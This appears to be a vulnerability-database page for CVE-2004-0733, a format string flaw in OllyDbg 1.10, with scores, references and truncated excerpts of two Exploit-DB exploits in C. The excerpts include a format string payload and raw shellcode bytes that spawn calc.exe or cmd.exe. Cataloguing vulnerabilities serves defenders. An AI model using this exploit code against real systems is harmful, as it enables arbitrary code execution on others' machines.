CVE-2004-0733
published 2004-07-27CVE-2004-0733: Format string vulnerability in OllyDbg 1.10 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via format string…
PriorityP432high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
5.07%
91.3th percentile
Format string vulnerability in OllyDbg 1.10 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via format string specifiers that are directly provided to the OutputDebugString function call.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ollydbg | ollydbg | — | — |
| ollydbg | ollydbg | — | — |
| ollydbg | ollydbg | — | — |
| ollydbg | ollydbg | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
OllyDbg 1.10 - Local Format String
exploitdb·2007-04-17
CVE-2004-0733 OllyDbg 1.10 - Local Format String
OllyDbg 1.10 - Local Format String
---
/*
..::[ jamikazu presents ]::..
OllyDbg v110 Local Format String Exploit (0day)
Author: jamikazu
Mail: [email protected]
web: http://jamikazu.110mb.com/
Bug discovered by Ned from (http://felinemenace.org/)
Credit: ap0x,milw0rm
Greets: All turkish security researchers ...
invokes calc.exe if successful
You can use it for your AntiCrack tricks against vuln OllyDbg
*/
#define NO_WIN32_LEAN_AND_MEAN
#include
#include
#define FORMAT_STRING "%4602u"
#define XOR_DWORD 0x02020202
#ifdef __BORLANDC__
# pragma option -w-asc
# pragma option -w-eff
#else
#pragma comment(linker,"/ENTRY:WinMain")
#pragma comment(lib, "msvcrt.lib")
#endif
// shellcode xored with 0x02 ,Size : 239 by jamikazu
// First gives message than invokes calc.exe
// You can
Exploit-DB
OllyDbg 1.10 - Format String
exploitdb·2004-08-10
CVE-2004-0733 OllyDbg 1.10 - Format String
OllyDbg 1.10 - Format String
---
// Exploit opens a new cmd.exe.Tested on win2k(en)+sp4(en)+ollydbg v1.09d
// Open exploit with ollydebug and run the exploit from ollydebug(F9 key).
// Coded by Ahmet Cihan(a.k.a. hurby)
// Thanx to r3d_b4r0n, Murat Erdo??an(a.k.a. Stormwr), Onur Cihan(a.k.a.eurnie and 3710336), Orhan Tun????z and Mehmet Yakut.
#include
#include
#include
#pragma comment(lib,"kernel32.lib")
void main(){
unsigned char buffer[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
\x90\x90\x90\x90\xEB\x0F\x58\x80\x30\x99\x40\x81\x38\x54\x55\x52\x4B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF\
\x12\x75\xCC\x12\x75\xF1\xFC\xE1\xFC\
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2004-07/0711.htmlhttp://marc.info/?l=bugtraq&m=109007978822810&w=2http://www.securityfocus.com/bid/10742https://exchange.xforce.ibmcloud.com/vulnerabilities/16711https://www.exploit-db.com/exploits/3757http://archives.neohapsis.com/archives/fulldisclosure/2004-07/0711.htmlhttp://marc.info/?l=bugtraq&m=109007978822810&w=2http://www.securityfocus.com/bid/10742https://exchange.xforce.ibmcloud.com/vulnerabilities/16711https://www.exploit-db.com/exploits/3757
2004-07-27
Published